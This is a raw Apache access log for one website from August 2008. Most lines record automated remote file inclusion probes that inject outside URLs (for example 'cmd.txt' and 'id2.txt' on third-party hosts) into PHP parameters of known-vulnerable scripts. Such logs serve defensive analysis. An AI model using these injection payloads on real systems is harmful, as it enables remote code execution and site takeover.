205.234.198.174 - - [01/Aug/2008:01:07:17 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:07:17 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:07:34 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:07:35 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:08:59 -0700] "GET /logs/access_080601.log/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:09:09 -0700] "GET /logs/access.log/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:09:09 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:09:09 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:09:55 -0700] "GET /logs/access.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:09:56 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:09:56 -0700] "GET /logs/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:10:08 -0700] "GET /logs/access.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:10:09 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:10:25 -0700] "GET /logs/access.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:10:26 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:10:26 -0700] "GET /logs/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:10:37 -0700] "GET /logs/access.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:10:37 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:10:41 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:11:50 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:11:59 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:01:13:33 -0700] "GET /logs/access_080531.log/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:01:13:33 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:01:13:33 -0700] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:01:14:28 -0700] "GET /logs/access_080701.log/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:01:17:23 -0700] "GET /logs/access_080531.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
209.25.195.243 - - [01/Aug/2008:01:18:27 -0700] "GET /logs/access_080601.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:19:07 -0700] "GET /logs/access_080601.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
216.71.64.94 - - [01/Aug/2008:01:21:30 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:01:23:22 -0700] "GET /logs/access_080701.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:01:23:22 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:24:02 -0700] "GET /logs/access_080701.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:24:03 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
213.206.113.104 - - [01/Aug/2008:01:24:28 -0700] "GET /logs/access_080701.log///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.206.113.104 - - [01/Aug/2008:01:24:28 -0700] "GET ///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.206.113.104 - - [01/Aug/2008:01:24:29 -0700] "GET /logs///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:24:56 -0700] "GET /logs/access_080701.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:24:56 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:24:57 -0700] "GET /logs/errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:01:29:04 -0700] "GET /logs/access_080531.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:01:30:06 -0700] "GET //?path%5Bdocroot%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
70.84.182.98 - - [01/Aug/2008:01:30:11 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.195.37.186 - - [01/Aug/2008:01:32:59 -0700] "GET /logs/access_080601.log HTTP/1.0" 200 14946 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
213.206.113.104 - - [01/Aug/2008:01:34:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.206.113.104 - - [01/Aug/2008:01:34:57 -0700] "GET ///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
207.44.152.61 - - [01/Aug/2008:01:41:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 200 2357 "-" "Mozilla/5.0" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:01:44:42 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:01:44:42 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:02:01:55 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:02:01:55 -0700] "GET /zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:02:01:56 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:02:02:44 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:02:07:16 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:02:07:16 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:02:07:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:02:13:43 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:02:13:44 -0700] "GET /zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:02:13:45 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
216.145.16.236 - - [01/Aug/2008:02:22:12 -0700] "GET / HTTP/1.0" 200 631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; {E12EDDF0-EE40-C76D-85D0-8861BDE2E7AE}; SV1; .NET CLR 1.1.4322)" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:02:26:52 -0700] "GET /logs/access_080531.log/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:02:26:52 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:02:26:52 -0700] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
151.1.210.219 - - [01/Aug/2008:02:30:26 -0700] "GET /zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
72.29.69.3 - - [01/Aug/2008:02:31:43 -0700] "GET /logs/access_080701.log/bbs/skin/zero_vote/error.php?dir=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:02:32:07 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:02:42:52 -0700] "GET /zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
199.238.135.66 - - [01/Aug/2008:02:44:00 -0700] "GET /zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.symis.net"
213.133.102.211 - - [01/Aug/2008:02:45:23 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.symis.net"
213.133.102.211 - - [01/Aug/2008:02:45:23 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.symis.net"
213.133.102.211 - - [01/Aug/2008:02:45:23 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.symis.net"
213.133.102.211 - - [01/Aug/2008:02:45:25 -0700] "GET /logs/access_080701.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.symis.net"
151.1.210.219 - - [01/Aug/2008:02:45:45 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [01/Aug/2008:02:45:46 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
151.1.210.219 - - [01/Aug/2008:02:47:38 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:02:54:33 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:02:54:33 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:02:54:55 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
199.238.135.66 - - [01/Aug/2008:02:57:15 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.symis.net"
199.238.135.66 - - [01/Aug/2008:02:57:15 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.symis.net"
199.238.135.66 - - [01/Aug/2008:02:57:30 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:02:57:51 -0700] "GET /logs/access.log/zero_vote/ask_password.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:02:57:52 -0700] "GET /zero_vote/ask_password.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:02:57:52 -0700] "GET /logs/zero_vote/ask_password.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:02:58:38 -0700] "GET /logs/access_080531.log/zero_vote/ask_password.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
91.121.143.183 - - [01/Aug/2008:03:18:00 -0700] "GET /!scanhttp://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
91.121.143.183 - - [01/Aug/2008:03:18:00 -0700] "GET /logs/!scanhttp://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
91.121.143.183 - - [01/Aug/2008:03:18:00 -0700] "GET /logs/access_080701.log/!scanhttp://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
91.121.143.183 - - [01/Aug/2008:03:18:01 -0700] "GET /logs/access_080531.log/!scanhttp://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
213.33.84.163 - - [01/Aug/2008:03:20:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
213.33.84.163 - - [01/Aug/2008:03:20:33 -0700] "GET //?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
213.33.84.163 - - [01/Aug/2008:03:20:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:42 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:42 -0700] "GET //?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:43 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:46 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:46 -0700] "GET //?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:46 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.romevillage.com/ids.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:52 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:52 -0700] "GET //?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:56 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:56 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:56 -0700] "GET //?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:56 -0700] "GET //?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:23:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:59 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:23:59 -0700] "GET //?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:24:00 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:24:27 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:24:28 -0700] "GET //?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:24:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:24:29 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:24:29 -0700] "GET //?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:24:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:25:01 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:25:01 -0700] "GET //?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:25:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:25:08 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:25:10 -0700] "GET //?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:25:11 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:26:56 -0700] "GET //?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:26:57 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
